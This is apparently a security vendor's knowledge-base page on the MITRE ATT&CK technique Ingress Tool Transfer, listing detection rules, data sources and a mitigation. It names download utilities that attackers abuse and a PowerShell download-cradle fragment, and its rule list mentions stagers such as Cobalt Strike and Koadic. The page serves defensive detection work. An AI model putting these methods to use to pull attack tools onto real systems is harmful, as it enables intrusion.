T1105: Ingress Tool Transfer
Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer).
On Windows, adversaries may use various utilities to download tools, such as copy, finger, certutil, and PowerShell commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as curl, scp, sftp, tftp, rsync, finger, and wget.
Adversaries may also abuse installers and package managers, such as yum or winget, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows search-ms protocol handler, to deliver malicious files to victims through remote file searches invoked by User Execution (typically after interacting with Phishing lures).
Files can also be transferred using various Web Services as well as native or otherwise present tools on the victim system. In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.
Positive Technologies products that cover the technique
MaxPatrol SIEM knowledge base
pt_application_firewall: PT-CR-637: PTAF_Reflected_File_Download_Detected: PT AF detected a reflected file download (RFD) attack mssql_database: PT-CR-408: MSSQL_Create_File_In_System: An attempt to create a file on a hard disk using a database kaspersky: PT-CR-1837: Kaspersky_Install_Malicious_App: A suspicious application is installed from Kaspersky Security Center kaspersky: PT-CR-1836: Subrule_Kaspersky_Run_Task_Install_App: A task is run and an application is installed from Kaspersky Security Center kaspersky: PT-CR-1835: Subrule_Kaspersky_Create_Package_And_Task: An installation package and task are created in Kaspersky Security Center remote_work: PT-CR-1913: File_Copy_Via_RemoteAccess_Tool: A suspicious file was created using a remote access tool microsoft_mecm: PT-CR-1876: MECM_Distribute_Content: Transferring a package or application to a distribution point in MECM mitre_attck_execution: PT-CR-1093: Subrule_Payload_Download_Via_WebClient: The MSDT_Remote_Code_Execution rule subrule detected connection to a remote storage and downloading of a malicious file mitre_attck_execution: PT-CR-1090: MSDT_Remote_Code_Execution: Vulnerability CVE-2022-34713 has been exploited in the msdt.exe service, and a malicious file is downloaded from an attacker host mitre_attck_execution: PT-CR-602: Finger_AWL_Bypass: An attempt to bypass application-start restrictions by using finger.exe (a built-in Microsoft Windows utility that displays information about users on a specified remote computer that is running the finger service) mitre_attck_initial_access: PT-CR-2301: Suspicious_File_Creation_From_Messenger_Or_Mail: A file with a suspicious extension was created on behalf of an instant messenger or email program, or malicious file activity was detected. This may indicate a phishing attack or malware being delivered to user's computer. mitre_attck_collection: PT-CR-1932: Copying_Files: Copying files and folders using xcopy and robocopy utilities, copy command, Copy-Item cmdlet unix_mitre_attck_command_and_control: PT-CR-295: Unix_Droppers_By_Daemons: Running a utility to transfer files on behalf of a service account is detected mitre_attck_command_and_control: PT-CR-608: Download_File_Through_Curl: A utility is started to download files mitre_attck_command_and_control: PT-CR-219: Remote_File_Download_Via_Certutil: An attempt to load data from external resources using the built-in utility certutil. Certutil can be used to obtain information about a certificate authority and configure certificate services. mitre_attck_command_and_control: PT-CR-609: Download_File_Through_Windows_Defender: An attempt to download a file with Windows Defender is detected mitre_attck_command_and_control: PT-CR-1816: Windows_Desktopimgdownldr_Ingress_Tool_Transfer: The built-in desktopimgdownldr utility was run with parameters that can be used to deliver attack tools mitre_attck_command_and_control: PT-CR-467: Suspicious_Connection: A network request made by executable files is detected mitre_attck_command_and_control: PT-CR-845: Download_Via_Encoded_Powershell: A user downloaded payload via an encoded PowerShell command unix_mitre_attck_lateral_movement: PT-CR-1699: Unix_File_Download_Via_GTFOBINS: The file was created using a GTFOBins utility. GTFOBins is a Unix binaries that can be used to bypass local security restrictions in misconfigured systems. mitre_attck_cred_access: PT-CR-600: Esentutil_Copy_File: The "esentutil" utility is started mitre_attck_lateral_movement: PT-CR-225: Creation_Suspicious_File: Creation of a potentially malicious file is detected mitre_attck_lateral_movement: PT-CR-224: Remote_Copying_Malicious_File: An attempt was detected to copy a potentially malicious file with the following extensions: hta, ps1, py, vbe, cs, csproj, proj, com, cmd, bat, vbs, js, xsl, sct mitre_attck_lateral_movement: PT-CR-222: Downloading_Remote_File_Via_Lolbas: An attempt to upload files is detected mitre_attck_lateral_movement: PT-CR-1373: Remote_Creation_Suspicious_File: Remote creation of a potentially malicious file is detected mitre_attck_lateral_movement: PT-CR-1372: Remote_SSP_Dump: The use of a script from a modified Impacket toolkit is detected. This allows to remotely dump the lsass process memory. hacking_tools: PT-CR-761: Subrule_Duplex_Powershell_Connect: A two-way connection using powershell.exe is detected hacking_tools: PT-CR-584: Empire_Stager: A PS script with an Empire stager substring is run hacking_tools: PT-CR-755: Cobalt_Strike_Stager: Possible startup of a Cobalt Strike stager hacking_tools: PT-CR-351: Koadic_Bitsadmin_Stager: Possible use of the Koadic software with BITSAdmin is detected hacking_tools: PT-CR-750: Cobalt_Strike_Powershell_Payload_Delivery: A user downloaded a payload using an encoded PowerShell command hacking_tools: PT-CR-365: Koadic_WMIC_Stager: Possible use of the Koadic software via a WMI script is detected hacking_tools: PT-CR-353: Koadic_MSHTA_Stager: Possible use of Koadic software (Koadic framework is designed for post-exploitation in Windows family operating systems) that runs a payload on the attacked host using Microsoft Windows HTML Application was detected hacking_tools: PT-CR-361: Koadic_Rundll32_Stager: Possible use of the Koadic software with Rundll32 is detected hacking_tools: PT-CR-748: Cobalt_Strike_Payload_Delivery_Check: Multiple attempts to verify payload delivery using Cobalt Strike software hacking_tools: PT-CR-587: SilentTrinity_Stager: Possible execution of the SilentTrinity stager is detected hacking_tools: PT-CR-357: Koadic_REGSVR32_Stager: Possible use of the Koadic software with Regsvr32 is detected
Detection
| ID | DS0022 | Data source and component | File: File Creation | Description | Monitor for file creation and files transferred into the network |
|---|
| ID | DS0029 | Data source and component | Network Traffic: Network Traffic Content | Description | Monitor network traffic content for files and other potentially malicious content, especially data coming in from abnormal/unknown domain and IPs. |
|---|
| ID | DS0017 | Data source and component | Command: Command Execution | Description | Monitor executed commands and arguments for suspicious activity associated with downloading external content. |
|---|
| ID | DS0029 | Data source and component | Network Traffic: Network Traffic Flow | Description | Monitor network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. |
|---|
| ID | DS0029 | Data source and component | Network Traffic: Network Connection Creation | Description | Monitor for newly constructed network connections that are sent or received by untrusted hosts or creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious. |
|---|
Mitigation
| ID | M1031 | Name | Network Intrusion Prevention | Description | Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known protocols like FTP can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. |
|---|